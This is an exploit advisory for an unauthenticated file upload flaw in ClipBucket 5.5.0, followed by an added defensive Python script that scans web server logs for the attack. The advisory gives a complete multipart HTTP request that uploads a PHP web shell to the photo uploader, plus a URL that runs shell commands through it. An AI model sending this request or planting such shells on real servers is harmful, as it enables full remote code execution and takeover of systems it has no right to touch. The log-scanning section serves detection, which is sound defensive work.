# Exploit Title: ClipBucket 5.5.0 - Arbitrary File Upload
# Google Dork: N/A
# Date: 2025-09-11
# Exploit Author: Mukundsinh Solanki (r00td3str0y3r)
# Vendor Homepage: https://clipbucket.com
# Software Link: https://github.com/MacWarrior/clipbucket-v5
# Version: <= 5.5.0
# Tested on: Ubuntu 20.04 LTS, PHP 7.4
# CVE: CVE-2025-55912

## Vulnerability Description:
ClipBucket <= 5.5.0 suffers from an unauthenticated arbitrary file upload vulnerability in `upload/actions/photo_uploader.php`. Missing access controls and insufficient validation of uploaded files allow an attacker to upload a crafted PHP file and execute it remotely, leading to full remote code execution (RCE).

## PoC Request:
POST /upload/actions/photo_uploader.php HTTP/1.1
Host: victim.com
Content-Type: multipart/form-data; boundary=----BOUND

------BOUND
Content-Disposition: form-data; name="Filedata"; filename="shell.php"
Content-Type: application/x-php

<?php system($_GET['cmd']); ?>
------BOUND--

The file is uploaded without authentication. The attacker can then access it:
http://victim.com/files/photos/shell.php?cmd=id

## Impact:
- Unauthenticated remote code execution (RCE)
- Full compromise of target application and underlying server

Regards,
Mukundsinh Solanki
+916355251151
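
## Detection (added example):
The upload-then-request sequence described above leaves a recognisable trace in web server access logs. The following is an added example, not part of the original advisory or of ClipBucket's code: it scans combined-format log lines for script files requested under `/files/photos/` and records whether the same client had earlier POSTed to `photo_uploader.php`. The extension list, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Paths taken from the advisory above.
UPLOADER = "/upload/actions/photo_uploader.php"
PHOTO_DIR = "/files/photos/"
# Assumption: extensions a PHP handler mapping may execute on the server.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)$", re.I)
# Combined log format: ip ident user [time] "METHOD target PROTO" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')

def find_suspicious(lines):
    """Flag script requests under the photo directory, correlated by client IP."""
    uploaders = set()  # clients that got a 2xx from the uploader endpoint
    findings = []
    for raw in lines:
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts, method, target, status = m.groups()
        path = unquote(urlsplit(target).path)  # drop query, decode %xx
        if method == "POST" and path == UPLOADER and status.startswith("2"):
            uploaders.add(ip)
        elif path.startswith(PHOTO_DIR) and SCRIPT_EXT.search(path):
            findings.append({
                "ip": ip, "time": ts, "path": path,
                "served": status.startswith("2"),   # 2xx: the file exists
                "prior_upload": ip in uploaders,     # same client uploaded first
            })
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [11/Sep/2025:10:00:01 +0000] "POST /upload/actions/photo_uploader.php HTTP/1.1" 200 87 "-" "-"',
    '203.0.113.7 - - [11/Sep/2025:10:00:04 +0000] "GET /files/photos/shell.php?cmd=id HTTP/1.1" 200 54 "-" "-"',
    '198.51.100.20 - - [11/Sep/2025:10:02:10 +0000] "GET /files/photos/2025/09/cat.jpg HTTP/1.1" 200 48211 "-" "-"',
    '198.51.100.20 - - [11/Sep/2025:10:05:00 +0000] "GET /files/photos/x.PHP HTTP/1.1" 404 153 "-" "-"',
    '192.0.2.5 - - [11/Sep/2025:10:06:30 +0000] "POST /upload/actions/photo_uploader.php HTTP/1.1" 200 87 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE):
        print(finding)
```

A finding with `served` and `prior_upload` both true is the highest-priority case; a request for a script under the photo directory is worth reviewing on its own, since that directory should only ever serve images.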